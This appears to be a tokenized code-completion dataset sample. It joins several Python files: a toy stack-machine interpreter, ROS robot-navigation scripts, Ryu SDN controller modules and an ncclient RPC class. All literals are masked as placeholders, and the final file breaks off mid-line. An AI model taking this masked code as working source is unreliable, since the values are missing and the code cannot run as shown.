<s> import sys <EOL> OPCODES = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:6> , <EOL> '<STR_LIT>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:11> , <EOL> '<STR_LIT>' : <NUM_LIT:12> , <EOL> '<STR_LIT>' : <NUM_LIT:16> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:20> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:30> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:32> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:50> , <EOL> '<STR_LIT>' : <NUM_LIT> <EOL> } <EOL> NAMES = dict ( ( v , k ) for k , v in OPCODES . iteritems ( ) ) <EOL> module = sys . modules [ __name__ ] <EOL> for name , value in OPCODES . iteritems ( ) : <EOL> setattr ( module , name , value ) <EOL> class Machine : <EOL> def __init__ ( self , sequence ) : <EOL> self . offset = <NUM_LIT:0> <EOL> self . sequence = sequence <EOL> self . stack = [ ] <EOL> def step ( self ) : <EOL> instruction = NAMES [ self . sequence [ self . offset ] ] <EOL> method = getattr ( self , "<STR_LIT>" % instruction . lower ( ) ) <EOL> method ( ) <EOL> return self . offset >= <NUM_LIT:0> and self . offset < len ( self . sequence ) <EOL> def run ( self ) : <EOL> result = True <EOL> while result : <EOL> result = self . step ( ) <EOL> def instruction_nop ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> def instruction_halt ( self ) : <EOL> self . offset = - <NUM_LIT:1> <EOL> def instruction_load ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> address = self . sequence [ self . offset ] <EOL> self . stack . append ( self . sequence [ address ] ) <EOL> self . offset += <NUM_LIT:1> <EOL> def instruction_save ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> address = self . sequence [ self . offset ] <EOL> self . sequence [ address ] = self . stack . pop ( ) <EOL> self . offset += <NUM_LIT:1> <EOL> def instruction_push ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> self . stack . append ( self . sequence [ self . offset ] ) <EOL> self . offset += <NUM_LIT:1> <EOL> def instruction_pop ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> self . stack . pop ( ) <EOL> def instruction_dup ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> self . stack . append ( self . stack [ - <NUM_LIT:1> ] ) <EOL> def instruction_jmp ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> address = self . sequence [ self . offset ] <EOL> self . offset = address <EOL> def instruction_call ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> self . stack . append ( self . offset + <NUM_LIT:1> ) <EOL> address = self . sequence [ self . offset ] <EOL> self . offset = address <EOL> def instruction_ret ( self ) : <EOL> address = self . stack . pop ( ) <EOL> self . offset = address <EOL> def instruction_jlt ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> address = self . sequence [ self . offset ] <EOL> value = self . stack . pop ( ) <EOL> self . offset += <NUM_LIT:1> <EOL> if value > <NUM_LIT:0> : <EOL> self . offset = address <EOL> def instruction_jlte ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> address = self . sequence [ self . offset ] <EOL> value = self . stack . pop ( ) <EOL> self . offset += <NUM_LIT:1> <EOL> if value >= <NUM_LIT:0> : <EOL> self . offset = address <EOL> def instruction_je ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> address = self . sequence [ self . offset ] <EOL> value = self . stack . pop ( ) <EOL> self . offset += <NUM_LIT:1> <EOL> if value == <NUM_LIT:0> : <EOL> self . offset = address <EOL> def instruction_jne ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> address = self . sequence [ self . offset ] <EOL> value = self . stack . pop ( ) <EOL> self . offset += <NUM_LIT:1> <EOL> if value != <NUM_LIT:0> : <EOL> self . offset = address <EOL> def instruction_jgte ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> address = self . sequence [ self . offset ] <EOL> value = self . stack . pop ( ) <EOL> self . offset += <NUM_LIT:1> <EOL> if value <= <NUM_LIT:0> : <EOL> self . offset = address <EOL> def instruction_jgt ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> address = self . sequence [ self . offset ] <EOL> value = self . stack . pop ( ) <EOL> self . offset += <NUM_LIT:1> <EOL> if value < <NUM_LIT:0> : <EOL> self . offset = address <EOL> def instruction_cmplt ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> b = self . stack . pop ( ) <EOL> a = self . stack . pop ( ) <EOL> self . stack . append ( int ( a < b ) ) <EOL> def instruction_cmplte ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> b = self . stack . pop ( ) <EOL> a = self . stack . pop ( ) <EOL> self . stack . append ( int ( a <= b ) ) <EOL> def instruction_cmpe ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> b = self . stack . pop ( ) <EOL> a = self . stack . pop ( ) <EOL> self . stack . append ( int ( a == b ) ) <EOL> def instruction_cmpne ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> b = self . stack . pop ( ) <EOL> a = self . stack . pop ( ) <EOL> self . stack . append ( int ( a != b ) ) <EOL> def instruction_cmpgt ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> b = self . stack . pop ( ) <EOL> a = self . stack . pop ( ) <EOL> self . stack . append ( int ( a > b ) ) <EOL> def instruction_cmpgte ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> b = self . stack . pop ( ) <EOL> a = self . stack . pop ( ) <EOL> self . stack . append ( int ( a >= b ) ) <EOL> def instruction_mul ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> self . stack . append ( self . stack . pop ( ) * self . stack . pop ( ) ) <EOL> def instruction_div ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> self . stack . append ( self . stack . pop ( ) / self . stack . pop ( ) ) <EOL> def instruction_add ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> self . stack . append ( self . stack . pop ( ) + self . stack . pop ( ) ) <EOL> def instruction_sub ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> self . stack . append ( self . stack . pop ( ) - self . stack . pop ( ) ) <EOL> def instruction_print ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> print self . stack [ - <NUM_LIT:1> ] <EOL> def instruction_debug ( self ) : <EOL> self . offset += <NUM_LIT:1> <EOL> self . debug ( ) <EOL> def debug ( self ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" + ` self . sequence ` <EOL> print "<STR_LIT>" + ` self . stack ` <EOL> print "<STR_LIT>" + ` self . offset ` <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> buffer = sys . stdin . read ( ) <EOL> code = eval ( buffer ) <EOL> machine = Machine ( code ) <EOL> machine . run ( ) <EOL> machine . debug ( ) </s>
<s> import logging <EOL> import settings <EOL> handlers = [ <EOL> ( logging . StreamHandler ( ) , logging . DEBUG ) , <EOL> ] <EOL> def init_logger ( ) : <EOL> log_formatter = logging . Formatter ( "<STR_LIT>" ) <EOL> main_logger = logging . getLogger ( ) <EOL> main_logger . setLevel ( logging . DEBUG ) <EOL> for handler , level in handlers : <EOL> handler . setFormatter ( log_formatter ) <EOL> handler . setLevel ( level ) <EOL> main_logger . addHandler ( handler ) </s>
<s> import rospy <EOL> import actionlib <EOL> from move_base_msgs . msg import MoveBaseAction , MoveBaseGoal <EOL> waypoints = [ <EOL> [ ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> ) , ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) ] , <EOL> [ ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> ) , ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , - <NUM_LIT> , <NUM_LIT> ) ] <EOL> ] <EOL> def goal_pose ( pose ) : <EOL> goal_pose = MoveBaseGoal ( ) <EOL> goal_pose . target_pose . header . frame_id = '<STR_LIT>' <EOL> goal_pose . target_pose . pose . position . x = pose [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> goal_pose . target_pose . pose . position . y = pose [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> goal_pose . target_pose . pose . position . z = pose [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> goal_pose . target_pose . pose . orientation . x = pose [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> goal_pose . target_pose . pose . orientation . y = pose [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> goal_pose . target_pose . pose . orientation . z = pose [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] <EOL> goal_pose . target_pose . pose . orientation . w = pose [ <NUM_LIT:1> ] [ <NUM_LIT:3> ] <EOL> return goal_pose <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> rospy . init_node ( '<STR_LIT>' ) <EOL> client = actionlib . SimpleActionClient ( '<STR_LIT>' , MoveBaseAction ) <EOL> client . wait_for_server ( ) <EOL> while True : <EOL> for pose in waypoints : <EOL> goal = goal_pose ( pose ) <EOL> client . send_goal ( goal ) <EOL> client . wait_for_result ( ) </s>
<s> import rospy , actionlib <EOL> from control_msgs . msg import ( FollowJointTrajectoryAction , <EOL> FollowJointTrajectoryGoal ) <EOL> from trajectory_msgs . msg import JointTrajectory , JointTrajectoryPoint <EOL> arm_joint_names = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> arm_intermediate_positions = [ <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT:0.0> ] <EOL> arm_joint_positions = [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT:0.0> ] <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> rospy . init_node ( "<STR_LIT>" ) <EOL> arm_client = actionlib . SimpleActionClient ( "<STR_LIT>" , FollowJointTrajectoryAction ) <EOL> arm_client . wait_for_server ( ) <EOL> trajectory = JointTrajectory ( ) <EOL> trajectory . joint_names = arm_joint_names <EOL> trajectory . points . append ( JointTrajectoryPoint ( ) ) <EOL> trajectory . points [ <NUM_LIT:0> ] . positions = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:0> ] . velocities = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:0> ] . accelerations = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:0> ] . time_from_start = rospy . Duration ( <NUM_LIT:1.0> ) <EOL> trajectory . points . append ( JointTrajectoryPoint ( ) ) <EOL> trajectory . points [ <NUM_LIT:1> ] . positions = arm_intermediate_positions <EOL> trajectory . points [ <NUM_LIT:1> ] . velocities = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:1> ] . accelerations = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:1> ] . time_from_start = rospy . Duration ( <NUM_LIT> ) <EOL> trajectory . points . append ( JointTrajectoryPoint ( ) ) <EOL> trajectory . points [ <NUM_LIT:2> ] . positions = arm_joint_positions <EOL> trajectory . points [ <NUM_LIT:2> ] . velocities = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:2> ] . accelerations = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:2> ] . time_from_start = rospy . Duration ( <NUM_LIT> ) <EOL> arm_goal = FollowJointTrajectoryGoal ( ) <EOL> arm_goal . trajectory = trajectory <EOL> arm_goal . goal_time_tolerance = rospy . Duration ( <NUM_LIT:0.0> ) <EOL> arm_client . send_goal ( arm_goal ) <EOL> arm_client . wait_for_result ( rospy . Duration ( <NUM_LIT> ) ) </s>
<s> import json <EOL> from webob import Response <EOL> from ryu . app . wsgi import ControllerBase , WSGIApplication , route <EOL> from ryu . base import app_manager <EOL> from ryu . lib import dpid as dpid_lib <EOL> from ryu . topology . api import get_switch , get_link , get_host <EOL> class TopologyAPI ( app_manager . RyuApp ) : <EOL> _CONTEXTS = { <EOL> '<STR_LIT>' : WSGIApplication <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( TopologyAPI , self ) . __init__ ( * args , ** kwargs ) <EOL> wsgi = kwargs [ '<STR_LIT>' ] <EOL> wsgi . register ( TopologyController , { '<STR_LIT>' : self } ) <EOL> class TopologyController ( ControllerBase ) : <EOL> def __init__ ( self , req , link , data , ** config ) : <EOL> super ( TopologyController , self ) . __init__ ( req , link , data , ** config ) <EOL> self . topology_api_app = data [ '<STR_LIT>' ] <EOL> @ route ( '<STR_LIT>' , '<STR_LIT>' , <EOL> methods = [ '<STR_LIT:GET>' ] ) <EOL> def list_switches ( self , req , ** kwargs ) : <EOL> return self . _switches ( req , ** kwargs ) <EOL> @ route ( '<STR_LIT>' , '<STR_LIT>' , <EOL> methods = [ '<STR_LIT:GET>' ] , requirements = { '<STR_LIT>' : dpid_lib . DPID_PATTERN } ) <EOL> def get_switch ( self , req , ** kwargs ) : <EOL> return self . _switches ( req , ** kwargs ) <EOL> @ route ( '<STR_LIT>' , '<STR_LIT>' , <EOL> methods = [ '<STR_LIT:GET>' ] ) <EOL> def list_links ( self , req , ** kwargs ) : <EOL> return self . _links ( req , ** kwargs ) <EOL> @ route ( '<STR_LIT>' , '<STR_LIT>' , <EOL> methods = [ '<STR_LIT:GET>' ] , requirements = { '<STR_LIT>' : dpid_lib . DPID_PATTERN } ) <EOL> def get_links ( self , req , ** kwargs ) : <EOL> return self . _links ( req , ** kwargs ) <EOL> @ route ( '<STR_LIT>' , '<STR_LIT>' , <EOL> methods = [ '<STR_LIT:GET>' ] ) <EOL> def list_hosts ( self , req , ** kwargs ) : <EOL> return self . _hosts ( req , ** kwargs ) <EOL> @ route ( '<STR_LIT>' , '<STR_LIT>' , <EOL> methods = [ '<STR_LIT:GET>' ] , requirements = { '<STR_LIT>' : dpid_lib . DPID_PATTERN } ) <EOL> def get_hosts ( self , req , ** kwargs ) : <EOL> return self . _hosts ( req , ** kwargs ) <EOL> def _switches ( self , req , ** kwargs ) : <EOL> dpid = None <EOL> if '<STR_LIT>' in kwargs : <EOL> dpid = dpid_lib . str_to_dpid ( kwargs [ '<STR_LIT>' ] ) <EOL> switches = get_switch ( self . topology_api_app , dpid ) <EOL> body = json . dumps ( [ switch . to_dict ( ) for switch in switches ] ) <EOL> return Response ( content_type = '<STR_LIT:application/json>' , body = body ) <EOL> def _links ( self , req , ** kwargs ) : <EOL> dpid = None <EOL> if '<STR_LIT>' in kwargs : <EOL> dpid = dpid_lib . str_to_dpid ( kwargs [ '<STR_LIT>' ] ) <EOL> links = get_link ( self . topology_api_app , dpid ) <EOL> body = json . dumps ( [ link . to_dict ( ) for link in links ] ) <EOL> return Response ( content_type = '<STR_LIT:application/json>' , body = body ) <EOL> def _hosts ( self , req , ** kwargs ) : <EOL> dpid = None <EOL> if '<STR_LIT>' in kwargs : <EOL> dpid = dpid_lib . str_to_dpid ( kwargs [ '<STR_LIT>' ] ) <EOL> hosts = get_host ( self . topology_api_app , dpid ) <EOL> body = json . dumps ( [ host . to_dict ( ) for host in hosts ] ) <EOL> return Response ( content_type = '<STR_LIT:application/json>' , body = body ) </s>
<s> from rpc import RPC , RPCReply <EOL> from ncclient . xml_ import * <EOL> import util <EOL> class GetReply ( RPCReply ) : <EOL> """<STR_LIT>""" <EOL> def _parsing_hook ( self , root ) : <EOL> self . _data = None <EOL> if not self . _errors : <EOL> self . _data = root . find ( qualify ( "<STR_LIT:data>" ) ) <EOL> @ property <EOL> def data_ele ( self ) : <EOL> "<STR_LIT>" <EOL> if not self . _parsed : <EOL> self . parse ( ) <EOL> return self . _data <EOL> @ property <EOL> def data_xml ( self ) : <EOL> "<STR_LIT>" <EOL> if not self . _parsed : <EOL> self . parse ( ) <EOL> return to_xml ( self . _data ) <EOL> data = data_ele <EOL> "<STR_LIT>" <EOL> class Get ( RPC ) : <EOL> "<STR_LIT>" <EOL> REPLY_CLS = GetReply <EOL> "<STR_LIT>" <EOL> def request ( self , filter = None ) : <EOL> """<STR_LIT>""" <EOL> node = new_ele ( "<STR_LIT>" ) <EOL> if filter is not None : <EOL> node . append ( util . build_filter ( filter ) ) <EOL> return self . _request ( node ) <EOL> class GetConfig ( RPC ) : <EOL> "<STR_LIT>" <EOL> REPLY_CLS = GetReply <EOL> "<STR_LIT>" <EOL> def request ( self , source , filter = None ) : <EOL> """<STR_LIT>""" <EOL> node = new_ele ( "<STR_LIT>" ) <EOL> node . append ( util . datastore_or_url ( "<STR_LIT:source>" , source , self . _assert ) ) <EOL> if filter is not None : <EOL> node . append ( util . build_filter ( filter ) ) <EOL> return self . _request ( node ) <EOL> class Dispatch ( RPC ) : <EOL> "<STR_LIT>" <EOL> REPLY_CLS = GetReply <EOL> "<STR_LIT>" <EOL> def request ( self , rpc_command , source = None , filter = None ) : <EOL> """<STR_LIT>""" <EOL> if ET . iselement ( rpc_command ) : <EOL> node = rpc_command <EOL> else : <EOL> node = new_ele ( rpc_command ) <EOL> if source is not None : <EOL> node . append ( util . datastore_or_url ( "<STR_LIT:source>" , source , self . _assert ) ) <EOL> if filter is not None : <EOL> node . append ( util . build_filter ( filter ) ) <EOL> return self . _request ( node ) </s>
<s> import collections <EOL> import logging <EOL> import ryu . exception as ryu_exc <EOL> from ryu . base import app_manager <EOL> from ryu . controller import event <EOL> class RemoteDPIDAlreadyExist ( ryu_exc . RyuException ) : <EOL> message = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class TunnelKeyAlreadyExist ( ryu_exc . RyuException ) : <EOL> message = '<STR_LIT>' <EOL> class TunnelKeyNotFound ( ryu_exc . RyuException ) : <EOL> message = '<STR_LIT>' <EOL> class EventTunnelKeyBase ( event . EventBase ) : <EOL> def __init__ ( self , network_id , tunnel_key ) : <EOL> super ( EventTunnelKeyBase , self ) . __init__ ( ) <EOL> self . network_id = network_id <EOL> self . tunnel_key = tunnel_key <EOL> class EventTunnelKeyAdd ( EventTunnelKeyBase ) : <EOL> def __init__ ( self , network_id , tunnel_key ) : <EOL> super ( EventTunnelKeyAdd , self ) . __init__ ( network_id , tunnel_key ) <EOL> class EventTunnelKeyDel ( EventTunnelKeyBase ) : <EOL> def __init__ ( self , network_id , tunnel_key ) : <EOL> super ( EventTunnelKeyDel , self ) . __init__ ( network_id , tunnel_key ) <EOL> class EventTunnelPort ( event . EventBase ) : <EOL> def __init__ ( self , dpid , port_no , remote_dpid , add_del ) : <EOL> super ( EventTunnelPort , self ) . __init__ ( ) <EOL> self . dpid = dpid <EOL> self . port_no = port_no <EOL> self . remote_dpid = remote_dpid <EOL> self . add_del = add_del <EOL> class TunnelKeys ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , f ) : <EOL> super ( TunnelKeys , self ) . __init__ ( ) <EOL> self . send_event = f <EOL> def get_key ( self , network_id ) : <EOL> try : <EOL> return self [ network_id ] <EOL> except KeyError : <EOL> raise TunnelKeyNotFound ( network_id = network_id ) <EOL> def _set_key ( self , network_id , tunnel_key ) : <EOL> self [ network_id ] = tunnel_key <EOL> self . send_event ( EventTunnelKeyAdd ( network_id , tunnel_key ) ) <EOL> def register_key ( self , network_id , tunnel_key ) : <EOL> if network_id in self : <EOL> raise ryu_exc . NetworkAlreadyExist ( network_id = network_id ) <EOL> if tunnel_key in self . values ( ) : <EOL> raise TunnelKeyAlreadyExist ( tunnel_key = tunnel_key ) <EOL> self . _set_key ( network_id , tunnel_key ) <EOL> def update_key ( self , network_id , tunnel_key ) : <EOL> if network_id not in self and tunnel_key in self . values ( ) : <EOL> raise TunnelKeyAlreadyExist ( key = tunnel_key ) <EOL> key = self . get ( network_id ) <EOL> if key is None : <EOL> self . _set_key ( network_id , tunnel_key ) <EOL> return <EOL> if key != tunnel_key : <EOL> raise ryu_exc . NetworkAlreadyExist ( network_id = network_id ) <EOL> def delete_key ( self , network_id ) : <EOL> try : <EOL> tunnel_key = self [ network_id ] <EOL> self . send_event ( EventTunnelKeyDel ( network_id , tunnel_key ) ) <EOL> del self [ network_id ] <EOL> except KeyError : <EOL> raise ryu_exc . NetworkNotFound ( network_id = network_id ) <EOL> class DPIDs ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , f ) : <EOL> super ( DPIDs , self ) . __init__ ( ) <EOL> self . dpids = collections . defaultdict ( dict ) <EOL> self . send_event = f <EOL> def list_ports ( self , dpid ) : <EOL> return self . dpids [ dpid ] <EOL> def _add_remote_dpid ( self , dpid , port_no , remote_dpid ) : <EOL> self . dpids [ dpid ] [ port_no ] = remote_dpid <EOL> self . send_event ( EventTunnelPort ( dpid , port_no , remote_dpid , True ) ) <EOL> def add_remote_dpid ( self , dpid , port_no , remote_dpid ) : <EOL> if port_no in self . dpids [ dpid ] : <EOL> raise ryu_exc . PortAlreadyExist ( dpid = dpid , port = port_no , <EOL> network_id = None ) <EOL> self . _add_remote_dpid ( dpid , port_no , remote_dpid ) <EOL> def update_remote_dpid ( self , dpid , port_no , remote_dpid ) : <EOL> remote_dpid_ = self . dpids [ dpid ] . get ( port_no ) <EOL> if remote_dpid_ is None : <EOL> self . _add_remote_dpid ( dpid , port_no , remote_dpid ) <EOL> elif remote_dpid_ != remote_dpid : <EOL> raise ryu_exc . RemoteDPIDAlreadyExist ( dpid = dpid , port = port_no , <EOL> remote_dpid = remote_dpid ) <EOL> def get_remote_dpid ( self , dpid , port_no ) : <EOL> try : <EOL> return self . dpids [ dpid ] [ port_no ] <EOL> except KeyError : <EOL> raise ryu_exc . PortNotFound ( dpid = dpid , port = port_no ) <EOL> def delete_port ( self , dpid , port_no ) : <EOL> try : <EOL> remote_dpid = self . dpids [ dpid ] [ port_no ] <EOL> self . send_event ( EventTunnelPort ( dpid , port_no , remote_dpid , False ) ) <EOL> del self . dpids [ dpid ] [ port_no ] <EOL> except KeyError : <EOL> raise ryu_exc . PortNotFound ( dpid = dpid , port = port_no ) <EOL> def get_port ( self , dpid , remote_dpid ) : <EOL> try : <EOL> dp = self . dpids [ dpid ] <EOL> except KeyError : <EOL> raise ryu_exc . PortNotFound ( dpid = dpid , port = None , network_id = None ) <EOL> res = [ port_no for ( port_no , remote_dpid_ ) in dp . items ( ) <EOL> if remote_dpid_ == remote_dpid ] <EOL> assert len ( res ) <= <NUM_LIT:1> <EOL> if len ( res ) == <NUM_LIT:0> : <EOL> raise ryu_exc . PortNotFound ( dpid = dpid , port = None , network_id = None ) <EOL> return res [ <NUM_LIT:0> ] <EOL> class Tunnels ( app_manager . RyuApp ) : <EOL> def __init__ ( self ) : <EOL> super ( Tunnels , self ) . __init__ ( ) <EOL> self . name = '<STR_LIT>' <EOL> self . tunnel_keys = TunnelKeys ( self . send_event_to_observers ) <EOL> self . dpids = DPIDs ( self . send_event_to_observers ) <EOL> def get_key ( self , network_id ) : <EOL> return self . tunnel_keys . get_key ( network_id ) <EOL> def register_key ( self , network_id , tunnel_key ) : <EOL> self . tunnel_keys . register_key ( network_id , tunnel_key ) <EOL> def update_key ( self , network_id , tunnel_key ) : <EOL> self . tunnel_keys . update_key ( network_id , tunnel_key ) <EOL> def delete_key ( self , network_id ) : <EOL> self . tunnel_keys . delete_key ( network_id ) <EOL> def list_ports ( self , dpid ) : <EOL> return self . dpids . list_ports ( dpid ) . keys ( ) <EOL> def register_port ( self , dpid , port_no , remote_dpid ) : <EOL> self . dpids . add_remote_dpid ( dpid , port_no , remote_dpid ) <EOL> def update_port ( self , dpid , port_no , remote_dpid ) : <EOL> self . dpids . update_remote_dpid ( dpid , port_no , remote_dpid ) <EOL> def get_remote_dpid ( self , dpid , port_no ) : <EOL> return self . dpids . get_remote_dpid ( dpid , port_no ) <EOL> def delete_port ( self , dpid , port_no ) : <EOL> self . dpids . delete_port ( dpid , port_no ) <EOL> def get_port ( self , dpid , remote_dpid ) : <EOL> return self . dpids . get_port ( dpid , remote_dpid ) </s>
<s> """<STR_LIT>""" </s>
<s> import inspect <EOL> import six <EOL> import struct <EOL> from . import packet_base <EOL> from . import ethernet <EOL> class Packet ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , protocols = None , parse_cls = ethernet . ethernet ) : <EOL> super ( Packet , self ) . __init__ ( ) <EOL> self . data = data <EOL> if protocols is None : <EOL> self . protocols = [ ] <EOL> else : <EOL> self . protocols = protocols <EOL> if self . data : <EOL> self . _parser ( parse_cls ) <EOL> def _parser ( self , cls ) : <EOL> rest_data = self . data <EOL> while cls : <EOL> try : <EOL> proto , cls , rest_data = cls . parser ( rest_data ) <EOL> except struct . error : <EOL> break <EOL> if proto : <EOL> self . protocols . append ( proto ) <EOL> if rest_data : <EOL> self . protocols . append ( rest_data ) <EOL> def serialize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . data = bytearray ( ) <EOL> r = self . protocols [ : : - <NUM_LIT:1> ] <EOL> for i , p in enumerate ( r ) : <EOL> if isinstance ( p , packet_base . PacketBase ) : <EOL> if i == len ( r ) - <NUM_LIT:1> : <EOL> prev = None <EOL> else : <EOL> prev = r [ i + <NUM_LIT:1> ] <EOL> data = p . serialize ( self . data , prev ) <EOL> else : <EOL> data = six . binary_type ( p ) <EOL> self . data = data + self . data <EOL> def add_protocol ( self , proto ) : <EOL> """<STR_LIT>""" <EOL> self . protocols . append ( proto ) <EOL> def get_protocols ( self , protocol ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( protocol , packet_base . PacketBase ) : <EOL> protocol = protocol . __class__ <EOL> assert issubclass ( protocol , packet_base . PacketBase ) <EOL> return [ p for p in self . protocols if isinstance ( p , protocol ) ] <EOL> def get_protocol ( self , protocol ) : <EOL> """<STR_LIT>""" <EOL> result = self . get_protocols ( protocol ) <EOL> if len ( result ) > <NUM_LIT:0> : <EOL> return result [ <NUM_LIT:0> ] <EOL> return None <EOL> def __div__ ( self , trailer ) : <EOL> self . add_protocol ( trailer ) <EOL> return self <EOL> def __truediv__ ( self , trailer ) : <EOL> return self . __div__ ( trailer ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . protocols ) <EOL> def __getitem__ ( self , idx ) : <EOL> return self . protocols [ idx ] <EOL> def __setitem__ ( self , idx , item ) : <EOL> self . protocols [ idx ] = item <EOL> def __delitem__ ( self , idx ) : <EOL> del self . protocols [ idx ] <EOL> def __len__ ( self ) : <EOL> return len ( self . protocols ) <EOL> def __contains__ ( self , protocol ) : <EOL> if ( inspect . isclass ( protocol ) and <EOL> issubclass ( protocol , packet_base . PacketBase ) ) : <EOL> return protocol in [ p . __class__ for p in self . protocols ] <EOL> return protocol in self . protocols <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT:U+002CU+0020>' . join ( repr ( protocol ) for protocol in self . protocols ) <EOL> __repr__ = __str__ <EOL> def _PacketBase__div__ ( self , trailer ) : <EOL> pkt = Packet ( ) <EOL> pkt . add_protocol ( self ) <EOL> pkt . add_protocol ( trailer ) <EOL> return pkt <EOL> packet_base . PacketBase . __div__ = _PacketBase__div__ <EOL> packet_base . PacketBase . __truediv__ = _PacketBase__div__ </s>
<s> from struct import calcsize <EOL> from ryu . ofproto . ofproto_common import OFP_HEADER_SIZE <EOL> NXAST_RESUBMIT = <NUM_LIT:1> <EOL> NXAST_SET_TUNNEL = <NUM_LIT:2> <EOL> NXAST_DROP_SPOOFED_ARP__OBSOLETE = <NUM_LIT:3> <EOL> NXAST_SET_QUEUE = <NUM_LIT:4> <EOL> NXAST_POP_QUEUE = <NUM_LIT:5> <EOL> NXAST_REG_MOVE = <NUM_LIT:6> <EOL> NXAST_REG_LOAD = <NUM_LIT:7> <EOL> NXAST_NOTE = <NUM_LIT:8> <EOL> NXAST_SET_TUNNEL64 = <NUM_LIT:9> <EOL> NXAST_MULTIPATH = <NUM_LIT:10> <EOL> NXAST_AUTOPATH = <NUM_LIT:11> <EOL> NXAST_BUNDLE = <NUM_LIT:12> <EOL> NXAST_BUNDLE_LOAD = <NUM_LIT> <EOL> NXAST_RESUBMIT_TABLE = <NUM_LIT> <EOL> NXAST_OUTPUT_REG = <NUM_LIT:15> <EOL> NXAST_LEARN = <NUM_LIT:16> <EOL> NXAST_EXIT = <NUM_LIT> <EOL> NXAST_DEC_TTL = <NUM_LIT> <EOL> NXAST_FIN_TIMEOUT = <NUM_LIT> <EOL> NXAST_CONTROLLER = <NUM_LIT:20> <EOL> NXAST_CONJUNCTION = <NUM_LIT> <EOL> NXAST_CT = 